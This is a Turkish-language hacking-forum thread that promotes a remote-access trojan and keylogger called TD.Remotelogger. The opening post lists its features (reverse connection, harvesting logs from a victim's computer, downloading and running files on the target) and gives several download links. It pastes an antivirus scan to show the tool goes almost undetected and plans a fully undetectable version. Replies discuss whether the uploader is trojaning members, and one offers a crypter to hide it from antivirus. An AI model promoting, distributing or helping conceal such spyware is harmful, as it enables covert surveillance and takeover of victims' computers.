TD.Remotelogger V1.0
-


-trojan mantığıyla çalışır, ters bağlantı kullanır
-bilgileriniz serverda şifrelenerek saklanır
-kurbanın bilgisayarında biriken logları istediğiniz zaman bağlanıp
download edebilirsiniz, logları resetleyebilirsiniz-bilgisayar hakkında kapsamlı bilgi alabilirsiniz
-downloader ile hedef bilgisayarın desteklediği her türde dosyayı indirtip
çalıştırabilirsinizindirme linkleri:
http://www.fileden.com/files/2010/7/15/2915597/TDRemoteLogger_setup.rar
http://rapidshare.com/files/407197592/TDRemoteLogger_setup.rar
http://hotfile.com/dl/55085908/b601b18/TDRemoteLogger_setup.rar.html
http://depositfiles.com/en/files/72tktnhq5
http://www.megaupload.com/?d=CJBMMB1I -
bu arada indir ve çalıştır buttonuna basınca link vs bilgiler için başka form açılıyo program biraz aceleye geldiği için buttonun üstündeki text'i unutmuşum:F
-
2 senelik amator uye :) tahribati cok seviyo olmali
dikkat edin. wc ciler ortalikta kol geziyo
-
benim kefilim DE5TROY3R ve onun paylaştığı td.win32.b'nin olduğu sitede bu program da var sitenin hakkında kısmında adımı görebilirsin
http://www.tdsoftware.tr.cx/
sitedeki çoğu proje ortaktır kendisine de sorabilirsin online yakaladıgın zaman
-
ok pek bisi cikmadi zaten :)
deniyelim bakalim
Antivirus
Version Last Update Result a-squared 5.0.0.31 2010.07.16 - AhnLab-V3 2010.07.16.00 2010.07.15 - AntiVir 8.2.4.12 2010.07.15 - Antiy-AVL 2.0.3.7 2010.07.15 - Authentium 5.2.0.5 2010.07.15 - Avast 4.8.1351.0 2010.07.15 - Avast5 5.0.332.0 2010.07.15 - AVG 9.0.0.836 2010.07.15 - BitDefender 7.2 2010.07.16 - CAT-QuickHeal 11.00 2010.07.16 - ClamAV 0.96.0.3-git 2010.07.16 - Comodo 5441 2010.07.16 - DrWeb 5.0.2.03300 2010.07.16 - eSafe 7.0.17.0 2010.07.15 - eTrust-Vet 36.1.7713 2010.07.16 - F-Prot 4.6.1.107 2010.07.15 - F-Secure 9.0.15370.0 2010.07.16 - Fortinet 4.1.143.0 2010.07.15 - GData 21 2010.07.16 - Ikarus T3.1.1.84.0 2010.07.16 - Jiangmin 13.0.900 2010.07.15 - Kaspersky 7.0.0.125 2010.07.16 - McAfee 5.400.0.1158 2010.07.16 - McAfee-GW-Edition 2010.1 2010.07.15 - Microsoft 1.5902 2010.07.15 - NOD32 5282 2010.07.15 - Norman 6.05.11 2010.07.15 VBbot.EP nProtect 2010-07-15.02 2010.07.15 - Panda 10.0.2.7 2010.07.15 - PCTools 7.0.3.5 2010.07.16 - Prevx 3.0 2010.07.16 - Rising 22.56.04.01 2010.07.16 - Sophos 4.55.0 2010.07.16 - Sunbelt 6590 2010.07.16 - SUPERAntiSpyware 4.40.0.1006 2010.07.16 - Symantec 20101.1.1.7 2010.07.16 - TheHacker 6.5.2.1.316 2010.07.16 Adware/EShoper.v TrendMicro 9.120.0.1004 2010.07.15 - TrendMicro-HouseCall 9.120.0.1004 2010.07.16 - VBA32 3.12.12.6 2010.07.15 - ViRobot 2010.7.12.3932 2010.07.15 - VirusBuster 5.0.27.0 2010.07.15 - -
server şu an belli başlı bi kaç antiye tanınıyo antivir nod32 falan onları da halledince tanınmaz halini tekrar koyucam buraya antiviri atlatması biraz zor ama deneyecez=)
-
evet avira war makinada kuramadim.
-
SysTeMeRRoR bunu yazdı:
-----------------------------
2 senelik amator uye :) tahribati cok seviyo olmali
dikkat edin. wc ciler ortalikta kol geziyo
-----------------------------kolay deil hocam el deymesin diye o kadar uzun süre o hesap ı amatör saklamak x) X)
-
PanxeR 3. mesajı okur musun? sonradan gelenler şu mesajları adam gibi okuyup öyle konuşsun
herkez bu kadar rahatsız olduysa gören modlar silsin şu konuyu açtığıma pişman oldum
-
d0gan92 bunu yazdı:
-----------------------------
PanxeR 3. mesajı okur musun? sonradan gelenler şu mesajları adam gibi okuyup öyle konuşsun
herkez bu kadar rahatsız olduysa gören modlar silsin şu konuyu açtığıma pişman oldum
-----------------------------
kusura bakma hocada burda önce id ye sonra paylaşım sayına en son logine bakılırgeçici üyeliklerle tbt müridlerine trojan yediren çok oldu
antilerde görelmemesi zararsız olduğu anlamına gelmez..
ama gerkeçekten temizse zaman içinde kıymeti anlaşılır bu mesajların yerini tebrik mesajları alır küsmene gerek yok siteye hoca
-
Destroyerin olmali bu. destroyerin sitesinde vardi.
Benim crypterle cryptleyip gizleyebilirsiniz avlerden :P
